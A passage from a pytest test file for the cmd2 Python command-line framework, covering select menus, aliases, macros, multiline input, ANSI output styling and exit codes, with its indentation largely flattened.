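    """App whose commands exercise cmd2.Cmd.select() with each of the supported option formats."""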
def do_eat(self, arg):
"""Eat something, with a selection of sauces to choose from."""
# Pass in a single string of space-separated selections
sauce = self.select('sweet salty', 'Sauce? ')
result = '{food} with {sauce} sauce, yum!'
result = result.format(food=arg, sauce=sauce)
self.stdout.write(result + '\n')
def do_study(self, arg):
"""Learn something, with a selection of subjects to choose from."""
# Pass in a list of strings for selections
subject = self.select(['math', 'science'], 'Subject? ')
result = 'Good luck learning {}!\n'.format(subject)
self.stdout.write(result)
def do_procrastinate(self, arg):
"""Waste time in your manner of choice."""
# Pass in a list of tuples for selections
leisure_activity = self.select([('Netflix and chill', 'Netflix'), ('YouTube', 'WebSurfing')],
'How would you like to procrastinate? ')
        result = 'Have fun procrastinating with {}!\n'.format(leisure_activity)
self.stdout.write(result)
def do_play(self, arg):
"""Play your favorite musical instrument."""
# Pass in an uneven list of tuples for selections
instrument = self.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
result = 'Charm us with the {}...\n'.format(instrument)
self.stdout.write(result)
@pytest.fixture
def select_app():
app = SelectApp()
return app
def test_select_options(select_app, monkeypatch):
# Mock out the read_input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'bacon'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
{} with salty sauce, yum!
""".format(food))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Sauce? ')
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_big(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['3', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'3' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_small(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['0', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'0' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_strings(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "study")
expected = normalize("""
1. math
2. science
Good luck learning {}!
""".format('science'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Subject? ')
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "procrastinate")
expected = normalize("""
1. Netflix
2. WebSurfing
Have fun procrastinating with {}!
""".format('YouTube'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('How would you like to procrastinate? ')
# And verify the expected output to stdout
assert out == expected
def test_select_uneven_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "play")
expected = normalize("""
1. Electric Guitar
2. Drums
Charm us with the {}...
""".format('Drums'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Instrument? ')
# And verify the expected output to stdout
assert out == expected
def test_select_eof(select_app, monkeypatch):
# Ctrl-D during select causes an EOFError that just reprompts the user
read_input_mock = mock.MagicMock(name='read_input', side_effect=[EOFError, 2])
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
def test_select_ctrl_c(outsim_app, monkeypatch, capsys):
# Ctrl-C during select prints ^C and raises a KeyboardInterrupt
read_input_mock = mock.MagicMock(name='read_input', side_effect=KeyboardInterrupt)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
with pytest.raises(KeyboardInterrupt):
outsim_app.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
out = outsim_app.stdout.getvalue()
assert out.rstrip().endswith('^C')
class HelpNoDocstringApp(cmd2.Cmd):
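    """App with an argparse-decorated greet command that has no docstring, so its help comes entirely from the parser."""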
greet_parser = argparse.ArgumentParser()
greet_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser(greet_parser, with_unknown_args=True)
def do_greet(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
def test_help_with_no_docstring(capsys):
app = HelpNoDocstringApp()
app.onecmd_plus_hooks('greet -h')
out, err = capsys.readouterr()
assert err == ''
assert out == """usage: greet [-h] [-s]
optional arguments:
-h, --help show this help message and exit
-s, --shout N00B EMULATION MODE
"""
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_good():
editor = cmd2.Cmd.DEFAULT_EDITOR
path = utils.which(editor)
# Assert that the editor was found because some editor should exist on all Mac and Linux systems
assert path
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_bad():
nonexistent_editor = 'this_editor_does_not_exist.exe'
path = utils.which(nonexistent_editor)
# Assert that the non-existent editor wasn't found
assert path is None
class MultilineApp(cmd2.Cmd):
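    """App that registers orate as a multiline command for testing multiline statement parsing."""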
def __init__(self, *args, **kwargs):
super().__init__(*args, multiline_commands=['orate'], **kwargs)
orate_parser = argparse.ArgumentParser()
orate_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser(orate_parser, with_unknown_args=True)
def do_orate(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
@pytest.fixture
def multiline_app():
app = MultilineApp()
return app
def test_multiline_complete_empty_statement_raises_exception(multiline_app):
with pytest.raises(exceptions.EmptyStatement):
multiline_app._complete_statement('')
def test_multiline_complete_statement_without_terminator(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', return_value='\n')
builtins.input = m
command = 'orate'
args = 'hello world'
line = '{} {}'.format(command, args)
statement = multiline_app._complete_statement(line)
assert statement == args
assert statement.command == command
assert statement.multiline_command == command
def test_multiline_complete_statement_with_unclosed_quotes(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['quotes', '" now closed;'])
builtins.input = m
line = 'orate hi "partially open'
statement = multiline_app._complete_statement(line)
assert statement == 'hi "partially open\nquotes\n" now closed'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
assert statement.terminator == ';'
def test_multiline_input_line_to_statement(multiline_app):
# Verify _input_line_to_statement saves the fully entered input line for multiline commands
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['person', '\n'])
builtins.input = m
line = 'orate hi'
statement = multiline_app._input_line_to_statement(line)
assert statement.raw == 'orate hi\nperson\n'
assert statement == 'hi person'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
def test_clipboard_failure(base_app, capsys):
# Force cmd2 clipboard to be disabled
base_app._can_clip = False
# Redirect command output to the clipboard when a clipboard isn't present
base_app.onecmd_plus_hooks('help > ')
# Make sure we got the error output
out, err = capsys.readouterr()
assert out == ''
assert 'Cannot redirect to paste buffer;' in err and 'pyperclip' in err
class CommandResultApp(cmd2.Cmd):
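    """App whose commands set last_result to truthy and falsy cmd2.CommandResult values."""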
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_affirmative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=True)
def do_negative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=False)
def do_affirmative_no_data(self, arg):
self.last_result = cmd2.CommandResult(arg)
def do_negative_no_data(self, arg):
self.last_result = cmd2.CommandResult('', arg)
@pytest.fixture
def commandresult_app():
app = CommandResultApp()
return app
def test_commandresult_truthy(commandresult_app):
arg = 'foo'
run_cmd(commandresult_app, 'affirmative {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=True)
run_cmd(commandresult_app, 'affirmative_no_data {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg)
def test_commandresult_falsy(commandresult_app):
arg = 'bar'
run_cmd(commandresult_app, 'negative {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=False)
run_cmd(commandresult_app, 'negative_no_data {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult('', arg)
def test_is_text_file_bad_input(base_app):
# Test with a non-existent file
file_is_valid = utils.is_text_file('does_not_exist.txt')
assert not file_is_valid
# Test with a directory
dir_is_valid = utils.is_text_file('.')
assert not dir_is_valid
def test_eof(base_app):
# Only thing to verify is that it returns True
assert base_app.do_eof('')
def test_echo(capsys):
app = cmd2.Cmd()
app.echo = True
commands = ['help history']
app.runcmds_plus_hooks(commands)
out, err = capsys.readouterr()
assert out.startswith('{}{}\n'.format(app.prompt, commands[0]) + HELP_HISTORY.split()[0])
def test_read_input_rawinput_true(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
app = cmd2.Cmd()
app.use_rawinput = True
# Mock out input() to return input_str
monkeypatch.setattr("builtins.input", lambda *args: input_str)
# isatty is True
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
line = app.read_input(prompt_str)
assert line == input_str
# isatty is False
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=False)):
# echo True
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# echo False
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
def test_read_input_rawinput_false(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
def make_app(isatty: bool, empty_input: bool = False):
"""Make a cmd2 app with a custom stdin"""
app_input_str = '' if empty_input else input_str
fakein = io.StringIO('{}'.format(app_input_str))
fakein.isatty = mock.MagicMock(name='isatty', return_value=isatty)
new_app = cmd2.Cmd(stdin=fakein)
new_app.use_rawinput = False
return new_app
# isatty True
app = make_app(isatty=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == prompt_str
# isatty True, empty input
app = make_app(isatty=True, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert out == prompt_str
# isatty is False, echo is True
app = make_app(isatty=False)
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# isatty is False, echo is False
app = make_app(isatty=False)
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
# isatty is False, empty input
app = make_app(isatty=False, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert not out
def test_read_command_line_eof(base_app, monkeypatch):
read_input_mock = mock.MagicMock(name='read_input', side_effect=EOFError)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
line = base_app._read_command_line("Prompt> ")
assert line == 'eof'
def test_poutput_string(outsim_app):
msg = 'This is a test'
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert out == expected
def test_poutput_zero(outsim_app):
msg = 0
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = str(msg) + '\n'
assert out == expected
def test_poutput_empty_string(outsim_app):
msg = ''
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = '\n'
assert out == expected
def test_poutput_none(outsim_app):
msg = None
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = 'None\n'
assert out == expected
def test_poutput_ansi_always(outsim_app):
msg = 'Hello World'
ansi.allow_style = ansi.STYLE_ALWAYS
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = colored_msg + '\n'
assert colored_msg != msg
assert out == expected
def test_poutput_ansi_never(outsim_app):
msg = 'Hello World'
ansi.allow_style = ansi.STYLE_NEVER
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert colored_msg != msg
assert out == expected
# These are invalid names for aliases and macros
invalid_command_name = [
'""', # Blank name
constants.COMMENT_CHAR,
'!no_shortcut',
'">"',
'"no>pe"',
'"no spaces"',
'"nopipe|"',
'"noterm;"',
'noembedded"quotes',
]
def test_get_alias_completion_items(base_app):
run_cmd(base_app, 'alias create fake run_pyscript')
run_cmd(base_app, 'alias create ls !ls -hal')
results = base_app._get_alias_completion_items()
assert len(results) == len(base_app.aliases)
for cur_res in results:
assert cur_res in base_app.aliases
assert cur_res.description == base_app.aliases[cur_res]
def test_get_macro_completion_items(base_app):
run_cmd(base_app, 'macro create foo !echo foo')
run_cmd(base_app, 'macro create bar !echo bar')
results = base_app._get_macro_completion_items()
assert len(results) == len(base_app.macros)
for cur_res in results:
assert cur_res in base_app.macros
assert cur_res.description == base_app.macros[cur_res].value
def test_get_settable_completion_items(base_app):
results = base_app._get_settable_completion_items()
for cur_res in results:
assert cur_res in base_app.settables
assert cur_res.description == base_app.settables[cur_res].description
def test_alias_no_subcommand(base_app):
out, err = run_cmd(base_app, 'alias')
assert "Usage: alias [-h]" in err[0]
assert "Error: the following arguments are required: SUBCOMMAND" in err[1]
def test_alias_create(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake run_pyscript')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of aliases
out, err = run_cmd(base_app, 'alias list')
assert out == normalize('alias create fake run_pyscript')
# Look up the new alias
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake run_pyscript')
def test_alias_create_with_quoted_value(base_app):
"""Demonstrate that quotes in alias value will be preserved (except for redirectors and terminators)"""
# Create the alias
out, err = run_cmd(base_app, 'alias create fake help ">" "out file.txt" ";"')
assert out == normalize("Alias 'fake' created")
# Look up the new alias (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake help > "out file.txt" ;')
@pytest.mark.parametrize('alias_name', invalid_command_name)
def test_alias_create_invalid_name(base_app, alias_name, capsys):
out, err = run_cmd(base_app, 'alias create {} help'.format(alias_name))
assert "Invalid alias name" in err[0]
def test_alias_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'alias create help stuff')
assert "Alias cannot have the same name as a command" in err[0]
def test_alias_create_with_macro_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'macro create {} help'.format(macro))
out, err = run_cmd(base_app, 'alias create {} help'.format(macro))
assert "Alias cannot have the same name as a macro" in err[0]
def test_alias_that_resolves_into_comment(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake ' + constants.COMMENT_CHAR + ' blah blah')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert not out
assert not err
def test_alias_list_invalid_alias(base_app):
# Look up invalid alias
out, err = run_cmd(base_app, 'alias list invalid')
assert "Alias 'invalid' not found" in err[0]
def test_alias_delete(base_app):
# Create an alias
run_cmd(base_app, 'alias create fake run_pyscript')
# Delete the alias
out, err = run_cmd(base_app, 'alias delete fake')
assert out == normalize("Alias 'fake' deleted")
def test_alias_delete_all(base_app):
out, err = run_cmd(base_app, 'alias delete --all')
assert out == normalize("All aliases deleted")
def test_alias_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'alias delete fake')
assert "Alias 'fake' does not exist" in err[0]
def test_alias_delete_no_name(base_app):
out, err = run_cmd(base_app, 'alias delete')
assert "Either --all or alias name(s)" in err[0]
def test_multiple_aliases(base_app):
alias1 = 'h1'
alias2 = 'h2'
run_cmd(base_app, 'alias create {} help'.format(alias1))
run_cmd(base_app, 'alias create {} help -v'.format(alias2))
out, err = run_cmd(base_app, alias1)
verify_help_text(base_app, out)
out, err = run_cmd(base_app, alias2)
verify_help_text(base_app, out)
def test_macro_no_subcommand(base_app):
out, err = run_cmd(base_app, 'macro')
assert "Usage: macro [-h]" in err[0]
assert "Error: the following arguments are required: SUBCOMMAND" in err[1]
def test_macro_create(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake run_pyscript')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of macros
out, err = run_cmd(base_app, 'macro list')
assert out == normalize('macro create fake run_pyscript')
# Look up the new macro
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake run_pyscript')
def test_macro_create_with_quoted_value(base_app):
"""Demonstrate that quotes in macro value will be preserved (except for redirectors and terminators)"""
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help ">" "out file.txt" ";"')
assert out == normalize("Macro 'fake' created")
# Look up the new macro (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake help > "out file.txt" ;')
@pytest.mark.parametrize('macro_name', invalid_command_name)
def test_macro_create_invalid_name(base_app, macro_name):
out, err = run_cmd(base_app, 'macro create {} help'.format(macro_name))
assert "Invalid macro name" in err[0]
def test_macro_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'macro create help stuff')
assert "Macro cannot have the same name as a command" in err[0]
def test_macro_create_with_alias_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'alias create {} help'.format(macro))
out, err = run_cmd(base_app, 'macro create {} help'.format(macro))
assert "Macro cannot have the same name as an alias" in err[0]
def test_macro_create_with_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake help -v')
verify_help_text(base_app, out)
def test_macro_create_with_escaped_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {{1}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert err[0].startswith('No help on {1}')
def test_macro_usage_with_missing_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake arg1')
assert "expects at least 2 argument(s)" in err[0]
def test_macro_usage_with_exta_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake alias create')
assert "Usage: alias create" in out[0]
def test_macro_create_with_missing_arg_nums(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {3}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_create_with_invalid_arg_num(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {-1} {0}')
assert "Argument numbers must be greater than 0" in err[0]
def test_macro_create_with_unicode_numbered_arg(base_app):
# Create the macro expecting 1 argument
out, err = run_cmd(base_app, 'macro create fake help {\N{ARABIC-INDIC DIGIT ONE}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert "expects at least 1 argument(s)" in err[0]
def test_macro_create_with_missing_unicode_arg_nums(base_app):
out, err = run_cmd(base_app, 'macro create fake help {1} {\N{ARABIC-INDIC DIGIT THREE}}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_that_resolves_into_comment(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} blah blah')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake ' + constants.COMMENT_CHAR)
assert not out
assert not err
def test_macro_list_invalid_macro(base_app):
# Look up invalid macro
out, err = run_cmd(base_app, 'macro list invalid')
assert "Macro 'invalid' not found" in err[0]
def test_macro_delete(base_app):
    # Create a macro
run_cmd(base_app, 'macro create fake run_pyscript')
# Delete the macro
out, err = run_cmd(base_app, 'macro delete fake')
assert out == normalize("Macro 'fake' deleted")
def test_macro_delete_all(base_app):
out, err = run_cmd(base_app, 'macro delete --all')
assert out == normalize("All macros deleted")
def test_macro_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'macro delete fake')
assert "Macro 'fake' does not exist" in err[0]
def test_macro_delete_no_name(base_app):
out, err = run_cmd(base_app, 'macro delete')
assert "Either --all or macro name(s)" in err[0]
def test_multiple_macros(base_app):
macro1 = 'h1'
macro2 = 'h2'
run_cmd(base_app, 'macro create {} help'.format(macro1))
run_cmd(base_app, 'macro create {} help -v'.format(macro2))
out, err = run_cmd(base_app, macro1)
verify_help_text(base_app, out)
out2, err2 = run_cmd(base_app, macro2)
verify_help_text(base_app, out2)
assert len(out2) > len(out)
def test_nonexistent_macro(base_app):
from cmd2.parsing import StatementParser
exception = None
try:
base_app._resolve_macro(StatementParser().parse('fake'))
except KeyError as e:
exception = e
assert exception is not None
def test_perror_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.perror(msg)
out, err = capsys.readouterr()
assert err == ansi.style_error(msg) + end
def test_perror_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.perror(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_pwarning_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.pwarning(msg)
out, err = capsys.readouterr()
assert err == ansi.style_warning(msg) + end
def test_pwarning_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.pwarning(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_ppaged(outsim_app):
msg = 'testing...'
end = '\n'
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_blank(outsim_app):
msg = ''
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_none(outsim_app):
msg = None
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_strips_ansi_when_redirecting(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_TERMINAL
outsim_app._redirecting = True
outsim_app.ppaged(ansi.style(msg, fg='red'))
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_strips_ansi_when_redirecting_if_always(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
outsim_app._redirecting = True
colored_msg = ansi.style(msg, fg='red')
outsim_app.ppaged(colored_msg)
out = outsim_app.stdout.getvalue()
assert out == colored_msg + end
# We override cmd.parseline() so we always get consistent command parsing
# by parent methods we don't override. We don't need to test all the parsing
# logic here, because parseline() just calls StatementParser.parse_command_only().
def test_parseline_empty(base_app):
statement = ''
command, args, line = base_app.parseline(statement)
assert not command
assert not args
assert not line
def test_parseline(base_app):
statement = " command with 'partially completed quotes "
command, args, line = base_app.parseline(statement)
assert command == 'command'
assert args == "with 'partially completed quotes"
assert line == statement.strip()
def test_onecmd_raw_str_continue(outsim_app):
line = "help"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert not stop
verify_help_text(outsim_app, out)
def test_onecmd_raw_str_quit(outsim_app):
line = "quit"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert stop
assert out == ''
def test_onecmd_add_to_history(outsim_app):
line = "help"
saved_hist_len = len(outsim_app.history)
# Allow command to be added to history
outsim_app.onecmd(line, add_to_history=True)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len + 1
saved_hist_len = new_hist_len
# Prevent command from being added to history
outsim_app.onecmd(line, add_to_history=False)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len
def test_get_all_commands(base_app):
# Verify that the base app has the expected commands
commands = base_app.get_all_commands()
expected_commands = ['_relative_run_script', 'alias', 'edit', 'eof', 'help', 'history', 'macro',
'py', 'quit', 'run_pyscript', 'run_script', 'set', 'shell', 'shortcuts']
assert commands == expected_commands
def test_get_help_topics(base_app):
# Verify that the base app has no additional help_foo methods
custom_help = base_app.get_help_topics()
assert len(custom_help) == 0
def test_get_help_topics_hidden():
# Verify get_help_topics() filters out hidden commands
class TestApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_my_cmd(self, args):
pass
def help_my_cmd(self, args):
pass
app = TestApp()
assert 'my_cmd' in app.get_help_topics()
app.hidden_commands.append('my_cmd')
assert 'my_cmd' not in app.get_help_topics()
class ReplWithExitCode(cmd2.Cmd):
""" Example cmd2 application where we can specify an exit code when existing."""
def __init__(self):
super().__init__(allow_cli_args=False)
@cmd2.with_argument_list
def do_exit(self, arg_list) -> bool:
"""Exit the application with an optional exit code.
Usage: exit [exit_code]
Where:
* exit_code - integer exit code to return to the shell
"""
# If an argument was provided
if arg_list:
try:
self.exit_code = int(arg_list[0])
except ValueError:
self.perror("{} isn't a valid integer exit code".format(arg_list[0]))
self.exit_code = -1
# Return True to stop the command loop
return True
def postloop(self) -> None:
"""Hook method executed once when the cmdloop() method is about to return."""
self.poutput('exiting with code: {}'.format(self.exit_code))
@pytest.fixture
def exit_code_repl():
app = ReplWithExitCode()
app.stdout = utils.StdSim(app.stdout)
return app
def test_exit_code_default(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit')
builtins.input = m
expected = 'exiting with code: 0\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_exit_code_nonzero(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit 23')
builtins.input = m
expected = 'exiting with code: 23\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
class AnsiApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_echo(self, args):
self.poutput(args)
self.perror(args)
def do_echo_error(self, args):
self.poutput(ansi.style(args, fg='red'))
# perror uses colors by default
self.perror(args)
def test_ansi_pouterr_always_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some ANSI style sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_pouterr_always_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some ANSI style sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
# if colors are on, the output should have some ANSI style sequences in it
out, err = capsys.readouterr()
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
